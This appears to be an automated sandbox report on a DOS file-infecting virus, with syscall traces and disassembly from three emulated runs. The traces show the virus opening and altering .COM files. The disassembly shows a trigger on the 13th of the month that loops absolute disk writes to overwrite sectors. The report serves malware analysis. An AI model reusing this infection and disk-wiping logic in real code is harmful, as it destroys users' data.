Sample viewer

vx.netlux.org/Virus.DOS.Rape.575

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:04.392137655Z 255 PC: 1348f | UNKNOWN!
2018-12-17T23:00:04.393993143Z 44 PC: 1349b | Get time
0x1349b: and dl, 0xf
0x1349e: or dl, dl
0x134a0: jne 0x134ac
0x134a2: mov ah, 9
0x134a4: mov dx, si
0x134a6: add dx, 0x218
0x134aa: int 0x21
0x134ac: mov ah, 0x2a
0x134ae: int 0x21
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
2018-12-17T23:00:04.396149539Z 42 PC: 134b0 | Get date
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
0x134cb: push ax
0x134cc: int 0x26
0x134ce: popf
0x134cf: pop ax
0x134d0: inc ax
0x134d1: cmp ax, 0x1a
0x134d4: jb 0x134c6
0x134d6: jmp 0x134c3
0x134d8: mov bp, 0
2018-12-17T23:00:04.399216411Z 78 PC: 134e7 | Find first file
2018-12-17T23:00:04.405598498Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.422084011Z 61 PC: 13505 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:00:04.428515175Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.435506792Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.436980868Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.438489803Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.446046357Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.458386035Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.462375924Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.472322453Z 61 PC: 13505 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:00:04.478711056Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.484797178Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.485915499Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.487566809Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.494317586Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.503737413Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.509704751Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.519132225Z 61 PC: 13505 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:00:04.530688332Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.537221501Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.538473848Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.53965648Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.546585728Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.555856993Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.558196451Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.568405456Z 61 PC: 13505 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:00:04.575349356Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.58187619Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.584264684Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.586237883Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.593832653Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.617896287Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.620703993Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.63056825Z 61 PC: 13505 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:00:04.637500897Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.644042255Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.645785394Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.648208435Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.655164957Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.66766818Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.670377455Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.680370585Z 61 PC: 13505 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:00:04.687196681Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.694257137Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.696161088Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.697876053Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.705724114Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.71551192Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.718046306Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.731437632Z 61 PC: 13505 | Open file (Filename = 'PAH.COM')
2018-12-17T23:00:04.738025658Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.74521932Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.746724894Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.748627849Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.755917882Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.769639217Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.772810414Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.782777978Z 61 PC: 13505 | Open file (Filename = 'TEST.COM')
2018-12-17T23:00:04.794938395Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.817072962Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.819027187Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.826243702Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.836542063Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.838937646Z 78 PC: 134e7 | Find first file
2018-12-17T23:00:04.84545574Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.855949829Z 61 PC: 13505 | Open file (Filename = '\SLEEP.COM')
2018-12-17T23:00:04.87226572Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.878919211Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.881661521Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.883162014Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.890608439Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.901257586Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.904015841Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.914583275Z 61 PC: 13505 | Open file (Filename = '\PRINT.COM')
2018-12-17T23:00:04.922472412Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.928993644Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.930508196Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.93266456Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.945029189Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:04.954911694Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:04.958312181Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:04.968342622Z 61 PC: 13505 | Open file (Filename = '\HELLO.COM')
2018-12-17T23:00:04.974940579Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:04.982442833Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:04.984452638Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:04.986971954Z 62 PC: 135a4 | Close file
2018-12-17T23:00:04.994953091Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.005491847Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.008398227Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.018409523Z 61 PC: 13505 | Open file (Filename = '\PHANG.COM')
2018-12-17T23:00:05.025793789Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.032271429Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:05.033813342Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.035342542Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.043475518Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.055921454Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.059152004Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.06868155Z 61 PC: 13505 | Open file (Filename = '\PRINTA~1.COM')
2018-12-17T23:00:05.077230386Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.085558868Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:05.087693425Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.089992126Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.098602997Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.10825149Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.110796449Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.124096108Z 61 PC: 13505 | Open file (Filename = '\MANDEL.COM')
2018-12-17T23:00:05.131045737Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.138082194Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:05.140468985Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.141976805Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.148850828Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.161718531Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.164288267Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.17387243Z 61 PC: 13505 | Open file (Filename = '\PAH.COM')
2018-12-17T23:00:05.186064433Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.192517401Z 66 PC: 1353f | Move file pointer
2018-12-17T23:00:05.193937486Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.196087833Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.203163592Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.213477341Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.217292434Z 67 PC: 134ff | Get or set file attributes
2018-12-17T23:00:05.22709859Z 61 PC: 13505 | Open file (Filename = '\TEST.COM')
2018-12-17T23:00:05.233737095Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:00:05.241346693Z 87 PC: 135a0 | Get or set file date and time
2018-12-17T23:00:05.242914567Z 62 PC: 135a4 | Close file
2018-12-17T23:00:05.252830685Z 67 PC: 135b0 | Get or set file attributes
2018-12-17T23:00:05.263623448Z 79 PC: 135b9 | Find next file
2018-12-17T23:00:05.272855259Z 9 PC: 131bd | Display string (Could not find end pointer)
2018-12-17T23:00:05.280365448Z 8 PC: 131c1 | Console input without echo

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13415,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:10.970873191Z 255 PC: 1348f | UNKNOWN!
2018-12-25T12:38:10.972247889Z 44 PC: 1349b | Get time
0x1349b: and dl, 0xf
0x1349e: or dl, dl
0x134a0: jne 0x134ac
0x134a2: mov ah, 9
0x134a4: mov dx, si
0x134a6: add dx, 0x218
0x134aa: int 0x21
0x134ac: mov ah, 0x2a
0x134ae: int 0x21
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
2018-12-25T12:38:10.973947798Z 42 PC: 134b0 | Get date
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
0x134cb: push ax
0x134cc: int 0x26
0x134ce: popf
0x134cf: pop ax
0x134d0: inc ax
0x134d1: cmp ax, 0x1a
0x134d4: jb 0x134c6
0x134d6: jmp 0x134c3
0x134d8: mov bp, 0
2018-12-25T12:38:10.975633355Z 78 PC: 134e7 | Find first file
2018-12-25T12:38:10.980842174Z 67 PC: 134ff | Get or set file attributes
2018-12-25T12:38:10.996488935Z 61 PC: 13505 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:11.007680188Z 63 PC: 13516 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:38:11.014601153Z 66 PC: 1353f | Move file pointer
2018-12-25T12:38:11.016013999Z 87 PC: 135a0 | Get or set file date and time
2018-12-25T12:38:11.017989057Z 62 PC: 135a4 | Close file
2018-12-25T12:38:11.023895459Z 67 PC: 135b0 | Get or set file attributes
2018-12-25T12:38:11.032900299Z 79 PC: 135b9 | Find next file
2018-12-25T12:38:11.035523293Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.045509295Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.053548653Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.059838866Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.061416538Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.063655052Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.070654364Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.083294861Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.086317168Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.099448786Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.103591912Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.107894318Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.109135265Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.110452579Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.118022406Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.127500416Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.129885426Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.149128089Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.156213791Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.162314455Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.164058015Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.165604852Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.172532731Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.18268111Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.184492825Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.191128217Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.196045953Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.199988301Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.201038579Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.202768773Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.208714853Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.216144923Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.218701896Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.224793941Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.228732831Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.233680586Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.23472647Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.235975644Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.242993445Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.25296842Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.255719999Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.266579657Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.277936512Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.284393313Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.28579951Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.28741619Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.294265792Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.303904077Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.306846398Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.316181001Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.32272155Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.329082642Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.33043805Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.339437247Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.352317447Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.354988616Z 78 PC: 134e7 | Find first file (See above)
2018-12-25T12:38:11.360769164Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.370478982Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.377059544Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.383450285Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.385411791Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.387223778Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.394716772Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.408126138Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.411775466Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.421784401Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.430252573Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.437414558Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.439151775Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.443093805Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.450371247Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.460121433Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.463501946Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.473189849Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.485157925Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.492026334Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.493405579Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.494830669Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.502333276Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.512366915Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.514898178Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.525351845Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.531956091Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.538296269Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.540295311Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.542479228Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.549405695Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.559735912Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.564661971Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.574673584Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.581988164Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.58838545Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.589834588Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.598739291Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.60598558Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.618754841Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.622363631Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.632047621Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.639033454Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.64616031Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.647628823Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.64910826Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.656856313Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.666730088Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.669606487Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.682477496Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.68949528Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.695730529Z 66 PC: 1353f | Move file pointer (See above)
2018-12-25T12:38:11.698097274Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.700219987Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:11.70710478Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:11.887625959Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:11.891718289Z 67 PC: 134ff | Get or set file attributes (See above)
2018-12-25T12:38:11.956547825Z 61 PC: 13505 | Open file (See above)
2018-12-25T12:38:11.968639052Z 63 PC: 13516 | Read file or device (See above)
2018-12-25T12:38:11.976800397Z 87 PC: 135a0 | Get or set file date and time (See above)
2018-12-25T12:38:11.978704963Z 62 PC: 135a4 | Close file (See above)
2018-12-25T12:38:12.036091516Z 67 PC: 135b0 | Get or set file attributes (See above)
2018-12-25T12:38:12.046489493Z 79 PC: 135b9 | Find next file (See above)
2018-12-25T12:38:12.055617394Z 9 PC: 131bd | Display string (Could not find end pointer)
2018-12-25T12:38:12.062921614Z 8 PC: 131c1 | Console input without echo

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13415,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:11.04683128Z 255 PC: 1348f | UNKNOWN!
2018-12-25T12:38:11.048519312Z 44 PC: 1349b | Get time
0x1349b: and dl, 0xf
0x1349e: or dl, dl
0x134a0: jne 0x134ac
0x134a2: mov ah, 9
0x134a4: mov dx, si
0x134a6: add dx, 0x218
0x134aa: int 0x21
0x134ac: mov ah, 0x2a
0x134ae: int 0x21
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
2018-12-25T12:38:11.050936647Z 42 PC: 134b0 | Get date
0x134b0: cmp dl, 0xd
0x134b3: jne 0x134d8
0x134b5: xor ax, ax
0x134b7: int 0x10
0x134b9: mov ah, 9
0x134bb: mov dx, si
0x134bd: add dx, 0x1ca
0x134c1: int 0x21
0x134c3: mov ax, 2
0x134c6: mov cx, 0xff
0x134c9: xor dx, dx
0x134cb: push ax
0x134cc: int 0x26
0x134ce: popf
0x134cf: pop ax
0x134d0: inc ax
0x134d1: cmp ax, 0x1a
0x134d4: jb 0x134c6
0x134d6: jmp 0x134c3
0x134d8: mov bp, 0
2018-12-25T12:38:11.060768513Z 9 PC: 134c3 | Display string (String= 'Rage - RABID Int'nl Development Corp. By Data Disruptor - Thanks to Zodiac ')